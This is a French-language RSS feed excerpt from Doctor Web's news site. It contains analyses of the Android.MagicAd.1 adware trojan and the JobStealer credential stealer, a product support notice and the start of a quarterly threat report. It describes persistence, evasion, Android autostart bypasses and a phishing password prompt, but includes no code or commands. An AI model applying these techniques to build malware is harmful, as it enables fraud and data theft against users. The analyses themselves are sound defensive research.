&lt;p&gt;Certaines fonctionnalités malveillantes d’&lt;a href="https://vms.drweb.fr/search/?q=Android.MagicAd.1&amp;lng=fr"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; résident dans des modules dex cachés dans des bibliothèques natives chiffrées au sein du répertoire de ressources de fichiers du cheval de Troie. Lors de son exécution, il déchiffre ces bibliothèques, en extrait les composants et les exécute.&lt;/p&gt;

&lt;p&gt;Avant d'afficher des publicités, le cheval de Troie effectue une série de vérifications pour s'assurer de la sécurité de son environnement. Par exemple, il recherche des signes d'exécution dans un environnement virtuel, vérifie si son installation était organique, si l'adresse IP du périphérique infecté figure sur sa liste noire, etc.&lt;/p&gt;

&lt;p&gt;Si &lt;a href="https://vms.drweb.fr/search/?q=Android.MagicAd.1&amp;lng=fr"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; ne détecte aucune activité suspecte, il masque son icône dans la liste des programmes du menu de l'écran d'accueil. Il crée ensuite un canal de notification par lequel il lance plusieurs services persistants malveillants qui doivent s'exécuter en arrière-plan lorsque la fenêtre de l'application malveillante est fermée. Ensuite, à l'aide du planificateur de tâches, &lt;a href="https://vms.drweb.fr/search/?q=Android.MagicAd.1&amp;lng=fr"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; crée une tâche qui redémarre périodiquement les services qui vérifient le fonctionnement du canal de notification et, si nécessaire, le redémarre. De plus, lorsqu'il est exécuté sur des appareils dotés de versions relativement anciennes du système d'exploitation Android, le cheval de Troie lance un écran virtuel afin que le fonctionnement de l'un de ses composants ne soit pas interrompu par le système.
&lt;/p&gt;

&lt;p&gt;Pour afficher des publicités en arrière-plan lorsque sa fenêtre est fermée, &lt;a href="https://vms.drweb.fr/search/?q=Android.MagicAd.1&amp;lng=fr"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; utilise un certain nombre de techniques, sélectionnées en fonction du fabricant de l'appareil infecté. Dans ce cas, elles sont implémentées sans demander explicitement l'autorisation système &lt;span class="string"&gt;SYSTEM_ALERT_WINDOW&lt;/span&gt;, qui permet à l'application d'être affichée par-dessus d'autres programmes.&lt;/p&gt;

&lt;p&gt;Quelle que soit la méthode utilisée, toutes les bannières publicitaires sont chargées en tant qu'activité translucide (Translucent Activity), ce qui permet au cheval de Troie de les dessiner par-dessus les fenêtres existantes.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/03_Android.MagicAd_banner1.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/03_Android.MagicAd_banner1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/04_Android.MagicAd_banner2.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/04_Android.MagicAd_banner2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;

    &lt;a href="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/05_Android.MagicAd_banner3.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/05_Android.MagicAd_banner3.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/06_Android.MagicAd_banner4.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/06_Android.MagicAd_banner4.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;i&gt;Exemples de publicités affichées par Android.MagicAd.1&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Une des techniques consiste à utiliser des intentions (intents) adressées à d'autres applications. Cela permet au cheval de Troie de contourner les restrictions des versions récentes d'Android qui empêchent les programmes de se lancer automatiquement. En fonction du modèle de l'appareil infecté, &lt;a href="https://vms.drweb.fr/search/?q=Android.MagicAd.1&amp;lng=fr"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; utilise cette technique soit pour afficher lui-même des publicités, soit pour « forcer » directement les programmes cibles à afficher des bannières publicitaires.&lt;/p&gt;

&lt;p&gt;Dans une variante de cette méthode, le cheval de Troie cible&amp;nbsp;:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;
        le navigateur Mi Browser sur les appareils Xiaomi&amp;nbsp;;
    &lt;/li&gt;
    &lt;li&gt;
        l’interface utilisateur graphique MIUI SystemUI sur les appareils Xiaomi&amp;nbsp;;
    &lt;/li&gt;
    &lt;li&gt;
        Lanceur Amazon Fire TV Home Screen sur les appareils Amazon TV.
    &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Il s'agit d'applications système sur les appareils correspondants&amp;nbsp;; elles peuvent donc gérer les intentions même si elles ne sont pas lancées directement par l'utilisateur. Tant que ces programmes sont actifs et peuvent recevoir des intentions, &lt;a href="https://vms.drweb.fr/search/?q=Android.MagicAd.1&amp;lng=fr"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; peut les utiliser pour afficher des publicités.&lt;/p&gt;

&lt;p&gt;Il est important de noter que si Mi Browser est installé sur un appareil Xiaomi en tant qu'application non système, le cheval de Troie peut également l'utiliser pour afficher des publicités, jusqu'à ce que la fenêtre du navigateur ne soit pas fermée.&lt;/p&gt;

&lt;p&gt;Lorsqu’&lt;a href="https://vms.drweb.fr/search/?q=Android.MagicAd.1&amp;lng=fr"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; détecte Mi Browser sur un appareil compatible, il envoie une intention reportée de lancer de la publicité à son composant dex (qui est détecté par Dr.Web comme &lt;a href="https://vms.drweb.fr/search/?q=Android.MagicAd.1.origin&amp;lng=fr"&gt;&lt;b&gt;Android.MagicAd.1.origin&lt;/b&gt;&lt;/a&gt;). Ce composant génère sa propre intention à partir de celle-ci et la transmet au navigateur, qui extrait l'intention originale et lance la publicité en conséquence.&lt;/p&gt;

&lt;p&gt;L'interaction avec les deux autres programmes est légèrement différente&amp;nbsp;: ils servent à exécuter le cheval de Troie en arrière-plan. Tout d'abord, &lt;a href="https://vms.drweb.fr/search/?q=Android.MagicAd.1&amp;lng=fr"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; envoie une intention reportée au module &lt;a href="https://vms.drweb.fr/search/?q=Android.MagicAd.1.origin&amp;lng=fr"&gt;&lt;b&gt;Android.MagicAd.1.origin&lt;/b&gt;&lt;/a&gt; pour exécuter la publicité, et ce dernier transmet sa propre intention aux programmes cibles afin qu'ils le réveillent. Si l'application cible est MIUI SystemUI, elle répond en envoyant son intention de lancer le module. Si l'application cible est Amazon Fire TV Home Screen, elle lance directement le module en utilisant son nom de package. Une fois que le module &lt;a href="https://vms.drweb.fr/search/?q=Android.MagicAd.origin&amp;lng=fr"&gt;&lt;b&gt;Android.MagicAd.origin&lt;/b&gt;&lt;/a&gt; prend le contrôle, il lance les publicités qu'il a reçues dans une intention différée de l'application malveillante principale.&lt;/p&gt;

&lt;p&gt;Si le cheval de Troie ne parvient pas à afficher la publicité, il réessaie cette méthode deux fois, et si cela échoue, il tente d'afficher la publicité directement, sans utiliser d'intentions reportées ni son module dex malveillant.&lt;/p&gt;

&lt;p&gt;Une autre variante de cette méthode, similaire à la précédente, est utilisée pour faire fonctionner des programmes sur les appareils Vivo. La différence réside dans le fait que l’affichage des publicités est déclenché via Android Binder, un composant système qui assure l'interaction entre les processus. Dans ce cas, le cheval de Troie cible les programmes système suivants&amp;nbsp;:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;
        iManager,
    &lt;/li&gt;
    &lt;li&gt;
        Répértoire téléphonique,
    &lt;/li&gt;
    &lt;li&gt;
        Vivo Browser,
    &lt;/li&gt;
    &lt;li&gt;
        Baidu IME Customized.
    &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.fr/search/?q=Android.MagicAd.1&amp;lng=fr"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; les exécute via Android Binder, en lui envoyant des intentions régulières via le conteneur de données Parcel. Ces programmes lancent ensuite le composant de cheval de Troie &lt;a href="https://vms.drweb.fr/search/?q=Android.MagicAd.origin&amp;lng=fr"&gt;&lt;b&gt;Android.MagicAd.origin&lt;/b&gt;&lt;/a&gt; qui, après avoir quitté l'arrière-plan, affiche des publicités.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.fr/search/?q=Android.MagicAd.1&amp;lng=fr"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; prévoit également plusieurs autres méthodes pour afficher des publicités en arrière-plan, notamment via le lecteur multimédia. Contrairement aux méthodes ciblant des appareils spécifiques, celle-ci est universelle et fonctionne sur la plupart des modèles de différents fabricants.&lt;a href="https://vms.drweb.fr/search/?q= Android.MagicAd.1&amp;lng=fr"&gt;&lt;b&gt; Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; décrypte le fichier audio de son contenu et l'enregistre dans le répertoire de travail.&lt;/p&gt;

&lt;p&gt;Le malware lance ensuite sa propre instance du lecteur multimédia système, règle son volume au minimum et l'associe au système global de gestion multimédia du système d'exploitation Android. Ensuite, pour lancer la publicité,  &lt;a href="https://vms.drweb.fr/search/?q=Android.MagicAd.1&amp;lng=fr"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; installe un récepteur de diffusion qui suit les clics dans ce lecteur. Le cheval de Troie utilise ensuite une commande adb spécialisée pour imiter les actions de l'utilisateur en appuyant sur le bouton d'enregistrement du lecteur, après quoi il ferme immédiatement la fenêtre. Appuyer sur le bouton déclenche le récepteur multimédia du système, ce qui permet à &lt;a href="https://vms.drweb.fr/search/?q=Android.MagicAd.1&amp;lng=fr"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; de prendre le contrôle et de lancer la publicité.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://products.drweb.fr/mobile/android/" target="_blank" rel="noopener"&gt;Dr.Web Security Space pour appareils mobiles&lt;/a&gt; détecte et supprime de manière fiable toutes les versions connues du logiciel malveillant &lt;a href="https://vms.drweb.fr/search/?q=Android.MagicAd.1&amp;lng=fr"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;, qui ne représente donc aucune menace pour nos utilisateurs.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Android.MagicAd.1/README.adoc" target="_blank" rel="noopener"&gt;Indicateurs de compromission&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Plus d'info sur &lt;a href="https://vms.drweb.fr/search/?q=Android.MagicAd.1&amp;lng=fr"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Plus d'info sur &lt;a href="https://vms.drweb.fr/search/?q=Android.MagicAd.1.origin&amp;lng=fr"&gt;&lt;b&gt;Android.MagicAd.1.origin&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.fr/show/?i=15257&amp;lng=fr</guid><title>Modification de la durée de prise en charge des produits Dr.Web</title><link>https://news.drweb.fr/show/?i=15257&amp;lng=fr&amp;c=5</link><pubDate>Wed, 27 May 2026 10:51:31 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Conformément à la politique de cycle de vie, les conditions de prise en charge de plusieurs produits Dr.Web ont été prolongées.&lt;/newslead&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Centre de gestion de Dr.Web Enterprise Security Suite, version 13.0&lt;/li&gt;&lt;li&gt;Dr.Web Industrial, version 13.0&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Dr.Web Desktop Security Suite :&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Dr.Web 12.0 pour les postes de travail Windows&lt;/li&gt;&lt;li&gt;Dr.Web 12.0 pour les postes de travail macOS&lt;/li&gt;&lt;li&gt;Dr.Web 11.1 pour les postes de travail Linux&lt;/li&gt;&lt;li&gt;Dr.Web KATANA Business Edition 1.0&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Dr.Web Server Security Suite :&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Dr.Web 12.0 pour les serveurs Windows&lt;/li&gt;&lt;li&gt;Dr.Web 11.1 pour les serveurs UNIX&lt;/li&gt;&lt;li&gt;Dr.Web 12.0 pour les serveurs macOS&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Dr.Web Mail Security Suite :&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Dr.Web 11.1 pour les serveurs de messagerie Unix&lt;/li&gt;&lt;li&gt;Dr.Web 12.0 pour Microsoft Exchange Server&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Dr.Web Gateway Security Suite :&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Dr.Web 11.1 pour les passerelles Internet UNIX&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Dr.Web Mobile Security Suite :&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Dr.Web 12.0 pour les appareils mobiles Android&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Les informations actualisées concernant les délais de prise en charge sont disponibles sur la page dédiée au &lt;a href="https://support.drweb.com/lifecycle/"&gt;cycle de vie des produits&lt;/a&gt;.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb.fr/show/?i=15253&amp;lng=fr</guid><title>Fausses applications d’entretien d’embauche : un cheval de Troie vole les données et l’argent des utilisateurs Windows et macOS</title><link>https://news.drweb.fr/show/?i=15253&amp;lng=fr&amp;c=5</link><pubDate>Wed, 27 May 2026 08:00:00 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Les experts de Doctor Web mettent en garde contre la propagation du cheval de Troie JobStealer, qui dérobe des informations confidentielles aux utilisateurs d'ordinateurs sous macOS et Windows. Ce malware cible principalement les portefeuilles de cryptomonnaies. Sous prétexte d'entretiens d’embauche en ligne, les escrocs attirent leurs victimes potentielles vers des sites web malveillants, où ils leur proposent d'installer une prétendue application de visioconférence. En réalité, il s’agit du cheval de Troie JobStealer.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;L'attaque commence par la prise de contact les victimes potentielles, auxquelles un poste est proposé. Les malfaiteurs invitent ensuite les utilisateurs à des entretiens et leur fournissent des liens vers des «plateformes» de réunion en ligne, soi-disant destinées à rejoindre une vidéoconférence. Ces sites web semblent légitimes, mais il s’agit en réalité de pages frauduleuses. Elles téléchargent le logiciel malveillant JobStealer, dissimulé sous l'apparence d'un programme de conférence en ligne. Les cybercriminels utilisent également différentes apparences pour ces ressources en ligne et modifient le nom des programmes. Nos spécialistes ont identifié des variantes portant des noms tels que MeetLab, Juseo, Meetix, Carolla, et autres. Dans certains cas, les cybercriminels utilisent même le nom de services légitimes, comme Webex.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/01_JobStealer.png" data-fancybox=""&gt;
&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/01_JobStealer.1.png" alt="#drweb"&gt; &lt;/a&gt;
&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/02_JobStealer.png" data-fancybox=""&gt;
&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/02_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;i&gt;Exemples de faux sites web de visioconférence à partir desquels JobStealer est téléchargé.&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Pour convaincre les utilisateurs que les plateformes sont pleinement fonctionnelles, les escrocs créent des chaînes Telegram et des comptes de médias sociaux correspondants, par exemple, X.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/03_JobStealer.png" data-fancybox=""&gt;
&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/03_JobStealer.1.png" alt="#drweb"&gt;&lt;/a&gt;
&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/04_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/04_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;i&gt;Pour dissimuler le cheval de Troie sous l'apparence d'un logiciel légitime, les attaquants simulent une activité sur les réseaux sociaux.&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Les visiteurs des sites web malveillants se voient proposer deux options pour installer le programme sur les appareils macOS&amp;nbsp;:&lt;/p&gt;

&lt;ul class="list"&gt;
&lt;li&gt;Copier et exécuter la commande bash indiquée sur le site web dans le terminal&amp;nbsp;;&lt;/li&gt;
&lt;li&gt;Télécharger le fichier d'image disque au format &lt;span class="string"&gt;.dmg&lt;/span&gt; et l’exécuter.&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/05_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/05_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;
&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Le cheval de Troie JobStealer est téléchargé à partir de sites web malveillants, à la fois sous forme de conteneur DMG et en exécutant une commande bash dans le terminal.&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Dans le premier cas, lors de l'exécution de la commande dans le terminal, un script est automatiquement téléchargé et exécuté depuis Internet, lequel télécharge et exécute le fichier exécutable JobStealer (détecté comme&amp;nbsp;&lt;a href="https://vms.drweb.fr/search/?q=Mac.PWS.JobStealer.1&amp;lng=fr"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;).&lt;/p&gt;

&lt;p&gt;Dans le second cas, l'image DMG téléchargée contient initialement les fichiers mentionnés ci-dessus. Une fois montée, elle affiche les instructions d'installation de l'application. Ces instructions invitent l'utilisateur à ouvrir un terminal et à y glisser le script inclus. En réalité, au lieu d'installer un logiciel de visioconférence, le script lance un fichier cheval de Troie.&lt;/p&gt;

&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/06_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/06_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;
&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;i&gt;L'image montrant les instructions affichées à l'ouverture du fichier d'image du cheval de Troie JobStealer&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.fr/search/?q=Mac.PWS.JobStealer.1&amp;lng=fr"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&amp;nbsp;est un fichier conteneur exécutable au format Fat Mach-O et contient du code binaire pour plusieurs architectures de processeur à la fois - x64 et arm6. Selon la plateforme de l'ordinateur infecté, lors du lancement du cheval de Troie, le composant correspondant au processeur cible est automatiquement activé.&lt;/p&gt;

&lt;p&gt;Il est à noter qu'il existe différentes versions de&amp;nbsp;&lt;a href="https://vms.drweb.fr/search/?q=Mac.PWS.JobStealer.1&amp;lng=fr"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;. Les versions précédentes du logiciel malveillant ne prenaient pas en charge les ordinateurs Mac dotés d'une architecture arm64. Elles étaient également dépourvues de mécanismes d'obfuscation, que les auteurs du logiciel malveillant ont commencé à ajouter et à renforcer au fil des mises à jour.&lt;/p&gt;

&lt;p&gt;Après son lancement, &lt;a href="https://vms.drweb.fr/search/?q=Mac.PWS.JobStealer.1&amp;lng=fr"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&amp;nbsp;1affiche une fenêtre de phishing, où il signale une prétendue erreur dans son fonctionnement. Pour « remédier » au problème, le logiciel malveillant demande à l’utilisateur de fournir le mot de passe de son compte.&lt;/p&gt;

&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/07_JobStealer_app_error.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/07_JobStealer_app_error.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;i&gt;Une fenêtre d’hameçonnage demande le mot de passe d’un compte utilisateur Mac.&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Ensuite, &lt;a href="https://vms.drweb.fr/search/?q=Mac.PWS.JobStealer.1&amp;lng=fr"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&amp;nbsp;collecte les données suivantes&amp;nbsp;:&lt;/p&gt;

&lt;ul class="list"&gt;
&lt;li&gt;Version du système d'exploitation et identifiant de l'ordinateur&amp;nbsp;;&lt;/li&gt;
&lt;li&gt;Détails d'environ 300 extensions de navigateur/portefeuilles crypto installés sur les navigateurs cibles basés sur Chromium (Chrome, Opera, Brave, OperaGX, Vivaldi, Edge, Arc, CocCoc)&amp;nbsp;;&lt;/li&gt;
&lt;li&gt;Cookies de ces navigateurs&amp;nbsp;;&lt;/li&gt;
&lt;li&gt;mots de passe, ainsi que les informations de carte bancaire enregistrées dans les listes de remplissage automatique du navigateur&amp;nbsp;;&lt;/li&gt;
&lt;li&gt;fichiers de messagerie Telegram provenant des répertoires &lt;span class="string"&gt;/Library/Application Support/Telegram Desktop/tdata&lt;/span&gt; et &lt;span class="string"&gt;/Documents/temp_data/Apps/Telegram&lt;/span&gt;, où sont stockés les clés d'autorisation de session, les fichiers téléchargés, etc.&amp;nbsp;;&lt;/li&gt;
&lt;li&gt;notes de l'utilisateur issues de l'application Notes native de macOS&amp;nbsp;;&lt;/li&gt;
&lt;li&gt;disponibilité dans le système des applications de portefeuille crypto Ledger Live et Trezor Suite.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Ces données sont placées dans une archive ZIP et téléchargées sur un serveur C2.&lt;/p&gt;

&lt;p&gt;Les auteurs du virus ont également développé une version du cheval de Troie JobStealer pour les ordinateurs Windows. Ses fonctionnalités sont similaires à celles de la version macOS. De plus, certains sites web malveillants distribuant le logiciel malveillant proposent des sections permettant de télécharger l'application pour d'autres systèmes d'exploitation courants. Cependant, nos analystes antivirus n'ont détecté aucune distribution de ce type à ce jour. Par exemple, le bouton de téléchargement du programme pour Linux est soit inactif, soit il redirige vers la version Windows du cheval de Troie. De plus, les sections de téléchargement pour iOS et Android indiquent que ces versions sont en cours de développement. Il est également possible que des attaquants commencent à distribuer des variantes du cheval de Troie pour ces plateformes à l'avenir.&lt;/p&gt;

&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/08_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/08_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;i&gt;Des sites web malveillants pourraient potentiellement distribuer des versions du cheval de Troie JobStealer pour Linux, iOS et Android.&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Toutes les modifications connues du logiciel malveillant JobStealer sont détectées et supprimées de manière fiable par les produits antivirus Dr.Web Security Space pour macOS et Windows et ne constituent aucune menace pour nos utilisateurs. Les sites web frauduleux distribuant des chevaux de Troie ont été ajoutés à la base de données des ressources non recommandées et dangereuses et sont également bloqués par Dr.Web.
&lt;/p&gt;

&lt;h3&gt;MITRE ATT&amp;amp;CK®&lt;/h3&gt;

&lt;p&gt;Nous avons analysé le logiciel malveillant JobStealer à l'aide du framework MITRE&amp;nbsp;ATT&amp;amp;CK®, qui est une matrice décrivant les tactiques et les techniques utilisées par les cybercriminels pour attaquer les systèmes informatiques. En conséquence, les techniques clés suivantes ont été identifiées&amp;nbsp;:&lt;/p&gt;

&lt;div class="table-news-secondary"&gt;&lt;figure class="table"&gt;&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;&lt;strong&gt;Étape&lt;/strong&gt;&lt;/th&gt;&lt;th&gt;&lt;strong&gt;Technique&lt;/strong&gt;&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;Exécution&lt;/td&gt;
&lt;td&gt;
&lt;p&gt;Exécution assistée par l'utilisateur (T1204)&lt;/p&gt;
&lt;p&gt;Copier-coller malveillant (T1204.004)&lt;/p&gt;
&lt;p&gt;Fichier malveillant (T1204.002)&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;Détection&lt;/td&gt;
&lt;td&gt;Détection de fichiers et de répertoires (T1083)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;Collecte de données&lt;/td&gt;
&lt;td&gt;&lt;p&gt;Collecte automatisée (T1119)&lt;/p&gt;
&lt;p&gt;Données du système local (T1005)&lt;/p&gt;
&lt;p&gt;Identifiants provenant de gestionnaires de mots de passe (T1555)&lt;/p&gt;
&lt;p&gt;Trousseau d'accès (T1555.001)&lt;/p&gt;
&lt;p&gt;Identifiants provenant de navigateurs (T1555.003)&lt;/p&gt;
&lt;p&gt;Interception des données saisies (T1056)&lt;/p&gt;
&lt;p&gt;Interception d’entrée GUI (T1056.002)&lt;/p&gt;
&lt;p&gt;Archivage des données collectées (T1560)&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;Organisation de la gestion&lt;/td&gt;
&lt;td&gt;Service Web (T1102)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;Exfiltration de données&lt;/td&gt;
&lt;td&gt;&lt;p&gt;Exfiltration automatisée (T1020)&lt;/p&gt;
&lt;p&gt;Exfiltration via le canal de contrôle (T1041)&lt;/p&gt;
&lt;p&gt;Exfiltration via service Web (T1567)&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/div&gt;
&lt;p&gt;Plus d'info sur&amp;nbsp;&lt;a href="https://vms.drweb.fr/search/?q=Mac.PWS.JobStealer.1&amp;lng=fr"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Mac.PWS.JobStealer.1/README.adoc" target="_blank"&gt;Indicateurs de compromission&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.fr/show/?i=15135&amp;lng=fr</guid><title>Doctor Web : rapport viral du 1er trimestre 2026</title><link>https://news.drweb.fr/show/?i=15135&amp;lng=fr&amp;c=5</link><pubDate>Wed, 01 Apr 2026 01:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;le 1 avril 2026&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;Selon les statistiques de détection récoltées par Dr.Web Antivirus, le nombre total de menaces détectées lors du premier trimestre 2026 a augmenté de 6,77% par rapport au quatrième trimestre de l'année dernière. Le nombre de menaces uniques a diminué de 11,98%. Les logiciels malveillants les plus fréquemment détectés sur les appareils protégés étaient des logiciels publicitaires et des chevaux de Troie publicitaires, des téléchargeurs malveillants et des portes dérobées.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;Les logiciels malveillants les plus fréquemment détectés dans le trafic de messagerie étaient des scripts malveillants, des portes dérobées et diverses applications de type cheval de Troie. Les attaquants ont également diffusé des documents d'hameçonnage et des exploits par e-mail.&lt;/p&gt;

&lt;p&gt;Les utilisateurs dont les fichiers ont été affectés par des rançongiciels ont été les plus susceptibles de rencontrer des encodeurs &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;, &lt;b&gt;Trojan.Encoder.29750&lt;/b&gt; et &lt;b&gt;Trojan.Encoder.41868&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;Au cours du premier trimestre 2026, les analystes Internet de Doctor Web ont identifié de nouveaux sites d'hameçonnage, notamment de fausses ressources d'établissements de crédit et de marketplaces, ainsi qu'un certain nombre d'autres sites indésirables. &lt;/p&gt;

&lt;p&gt;Le secteur des appareils mobiles a connu une activité accrue des chevaux de Troie bancaires. Dans le même temps, nos analystes antivirus ont constaté une popularité croissante d'une méthode permettant de protéger les logiciels malveillants contre la détection par les logiciels antivirus, qui consiste à y ajouter du code inutile. &lt;/p&gt;

